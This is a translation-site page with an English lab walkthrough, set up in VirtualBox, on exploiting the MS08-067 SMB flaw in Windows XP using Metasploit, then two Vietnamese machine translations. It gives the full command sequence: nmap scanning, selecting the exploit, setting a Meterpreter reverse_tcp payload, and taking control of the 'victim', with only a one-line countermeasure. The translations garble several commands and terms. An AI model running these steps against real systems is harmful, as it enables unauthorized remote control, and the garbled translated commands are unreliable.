Step 1:Create Two Virtual Machine(VM) namely “Target” and “BT5”. Insta dịch - Step 1:Create Two Virtual Machine(VM) namely “Target” and “BT5”. Insta Việt làm thế nào để nói

Step 1:Create Two Virtual Machine(V

Step 1:
Create Two Virtual Machine(VM) namely “Target” and “BT5”. Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don’t know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim. For Eg., By sending link that will get the ip details or use Angry IP Scanner.
Step 3: Information Gathering
Now let us collect some information about the Target machine. For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type “nmap -O 192.168.56.12“. Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type “msfconsole“.

The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type “search netapi”. Now you can see the list of modules match with the netapi.


We are going to exploit MS08-067 , so type “use exploit/windows/smb/ms08_067_netapi“.

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.

Step 6: Options
Type “set LHOST 192.168.56.10“. Here 192.168.56.10 is IP address of Backtrack machine. You can find the ip address by typing ‘ifconfig’ command in the Terminal.

Type “set RHOST 192.168.56.12“. Here 192.168.56.12 is IP address of Target machine.


Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successful, you can see the following result.


Now we can control the remote computer using the meterpreter. For example, typing “screenshot” will grab the screenshot of the victim system.

CounterMeasures:
Update your OS frequently.
0/5000
Từ: -
Sang: -
Kết quả (Việt) 1: [Sao chép]
Sao chép!
Bước 1:Tạo hai ảo Machine(VM), cụ thể là "mục tiêu" và "BT5". Cài đặt XP bên trong mục tiêu máy ảo và quay lại bên trong BT5. Bắt đầu hai VMs.Nếu bạn không biết làm thế nào để tạo ra các máy ảo, sau đó xin vui lòng đọc hướng dẫn sử dụng VirtualBox này.Bước 2: Tìm địa chỉ IP của mục tiêuMở dấu nhắc lệnh trong mục tiêu machine(XP). Gõ vào "ipconfig" để tìm các địa chỉ IP của hệ thống nhắm mục tiêu.Hacker sử dụng các phương pháp khác nhau cho việc tìm kiếm địa chỉ ip của nạn nhân. Cho Eg., bằng cách gửi liên kết mà sẽ nhận được thông tin chi tiết của ip hoặc sử dụng tức giận IP máy quét.Bước 3: Thông tin thu thậpBây giờ hãy cho chúng tôi thu thập một số thông tin về máy tính mục tiêu. Cho mục đích này, chúng tôi sẽ sử dụng công cụ nmap.Mở The Terminal BT5 machine(Backtrack) và gõ "nmap - O 192.168.56.12". Đây 192.168.56.12 là địa chỉ IP của máy tính mục tiêu. Nếu bạn nhìn vào kết quả, bạn có thể tìm thấy danh sách các cổng mở và phiên bản hệ điều hành.Bước 4: MetasploitBây giờ mở nhà ga ở BT5 machine(Backtrack) và loại "msfconsole".Msfconsole là các giao diện phổ biến nhất cho các khuôn khổ Metasploit. Nó cung cấp một giao diện điều khiển tập trung "tất cả-trong-một" và cho phép bạn truy cập hiệu quả cho hầu như tất cả các tùy chọn có sẵn trong khuôn khổ Metasploit.Chúng ta hãy sử dụng lệnh tìm kiếm để tìm các mô-đun khai thác với từ khóa netapi. Loại "công cụ tìm netapi". Bây giờ bạn có thể xem danh sách các mô-đun kết hợp với netapi.Chúng ta sẽ khai thác lỗ hổng MS08-067, vì vậy, loại "sử dụng khai thác/windows/smb/ms08_067_netapi".Bước 5: Thiết lập tải trọngNhư thường lệ, cho phép sử dụng Tcp đảo ngược trọng khai thác này cũng. Loại "thiết lập tải windows-meterpreter-reverse_tcp" trong msfconsole.Bước 6: lựa chọnGõ "thiết lập LHOST 192.168.56.10". Đây 192.168.56.10 là địa chỉ IP của máy tính Backtrack. Bạn có thể tìm thấy địa chỉ ip bằng cách gõ lệnh 'ifconfig' tại nhà ga.Gõ "thiết lập RHOST 192.168.56.12". Đây 192.168.56.12 là địa chỉ IP của máy tính mục tiêu.Bước 7: khai thácOK, nó là thời gian để khai thác các lỗ hổng, loại "khai thác" trong giao diện điều khiển. Nếu việc khai thác thành công, bạn có thể xem kết quả sau.Bây giờ chúng ta có thể điều khiển máy tính từ xa bằng cách sử dụng meterpreter. Ví dụ: nhập "ảnh chụp màn hình" sẽ lấy ảnh chụp màn hình của hệ thống của nạn nhân.Biện pháp đối phó:Cập nhật hệ điều hành của bạn thường xuyên.
đang được dịch, vui lòng đợi..
Kết quả (Việt) 2:[Sao chép]
Sao chép!
Bước 1:
Tạo hai máy ảo (VM) cụ thể là "mục tiêu" và "BT5". Cài đặt XP bên trong mục tiêu VM và Backtrack bên BT5. Bắt đầu Hai máy ảo. Nếu bạn không biết làm thế nào để tạo ra các máy ảo, sau đó xin vui lòng đọc Hướng dẫn sử dụng VirtualBox này. Bước 2: Tìm địa chỉ IP của mục tiêu mở Các dấu nhắc lệnh trong máy Target (XP). Gõ "ipconfig" để tìm địa chỉ IP của hệ thống mục tiêu. Tin tặc sử dụng phương pháp khác nhau để tìm kiếm địa chỉ IP của nạn nhân. Đối với Ví dụ, Bằng cách gửi liên kết đó sẽ được các chi tiết ip hoặc sử dụng Angry IP Scanner.. Bước 3: Thông tin Gathering Bây giờ chúng ta thu thập một số thông tin về máy tính mục tiêu. Với mục đích này, chúng ta sẽ sử dụng các công cụ nmap. Mở Terminal trong máy BT5 (Backtrack) và gõ "nmap -O 192.168.56.12". Dưới đây 192.168.56.12 là địa chỉ IP của máy mục tiêu. Nếu bạn nhìn vào kết quả, bạn có thể tìm thấy danh sách các cổng mở và phiên bản hệ điều hành. Bước 4: Metasploit . Bây giờ mở Terminal trong máy BT5 (Backtrack) và Gõ "msfconsole" Các msfconsole là giao diện phổ biến nhất cho Metasploit framework. Nó cung cấp một "tất cả-trong-một" giao diện điều khiển tập trung và cho phép bạn truy cập hiệu quả cho hầu như tất cả các tùy chọn có sẵn trong Metasploit Framework. Chúng ta hãy sử dụng lệnh tìm kiếm để tìm các module khai thác với NetApi từ khóa. Gõ "NetApi tìm kiếm". Bây giờ bạn có thể xem danh sách các module phù hợp với NetApi. Chúng tôi sẽ khai thác MS08-067, do đó gõ "sử dụng khai thác / windows / smb / ms08_067_netapi". Bước 5: Đặt Payload Như thường lệ, hãy để sử dụng Reverse TCP Payload cho này cũng khai thác. Gõ "đặt trọng tải windows / Meterpreter / reverse_tcp" trong msfconsole. Bước 6: Tùy chọn gõ "thiết LHOST 192.168.56.10". Dưới đây 192.168.56.10 là địa chỉ IP của máy Backtrack. Bạn có thể tìm thấy địa chỉ ip bằng cách gõ lệnh "ifconfig" trong Terminal. Gõ "đặt RHOST 192.168.56.12". Dưới đây 192.168.56.12 là địa chỉ IP của máy mục tiêu. Bước 7: Khai thác Ok, đó là thời gian để khai thác lỗ hổng, loại "khai thác" trong giao diện điều khiển. Nếu khai thác thành công, bạn có thể xem kết quả sau đây. Bây giờ chúng ta có thể điều khiển máy tính từ xa bằng cách sử dụng Meterpreter. Ví dụ, gõ "screenshot" sẽ lấy các ảnh chụp màn hình của hệ thống nạn nhân. Biện pháp đối phó: Cập nhật hệ điều hành của bạn thường xuyên.







































đang được dịch, vui lòng đợi..
 
Các ngôn ngữ khác
Hỗ trợ công cụ dịch thuật: Albania, Amharic, Anh, Armenia, Azerbaijan, Ba Lan, Ba Tư, Bantu, Basque, Belarus, Bengal, Bosnia, Bulgaria, Bồ Đào Nha, Catalan, Cebuano, Chichewa, Corsi, Creole (Haiti), Croatia, Do Thái, Estonia, Filipino, Frisia, Gael Scotland, Galicia, George, Gujarat, Hausa, Hawaii, Hindi, Hmong, Hungary, Hy Lạp, Hà Lan, Hà Lan (Nam Phi), Hàn, Iceland, Igbo, Ireland, Java, Kannada, Kazakh, Khmer, Kinyarwanda, Klingon, Kurd, Kyrgyz, Latinh, Latvia, Litva, Luxembourg, Lào, Macedonia, Malagasy, Malayalam, Malta, Maori, Marathi, Myanmar, Mã Lai, Mông Cổ, Na Uy, Nepal, Nga, Nhật, Odia (Oriya), Pashto, Pháp, Phát hiện ngôn ngữ, Phần Lan, Punjab, Quốc tế ngữ, Rumani, Samoa, Serbia, Sesotho, Shona, Sindhi, Sinhala, Slovak, Slovenia, Somali, Sunda, Swahili, Séc, Tajik, Tamil, Tatar, Telugu, Thái, Thổ Nhĩ Kỳ, Thụy Điển, Tiếng Indonesia, Tiếng Ý, Trung, Trung (Phồn thể), Turkmen, Tây Ban Nha, Ukraina, Urdu, Uyghur, Uzbek, Việt, Xứ Wales, Yiddish, Yoruba, Zulu, Đan Mạch, Đức, Ả Rập, dịch ngôn ngữ.

Copyright ©2025 I Love Translation. All reserved.

E-mail: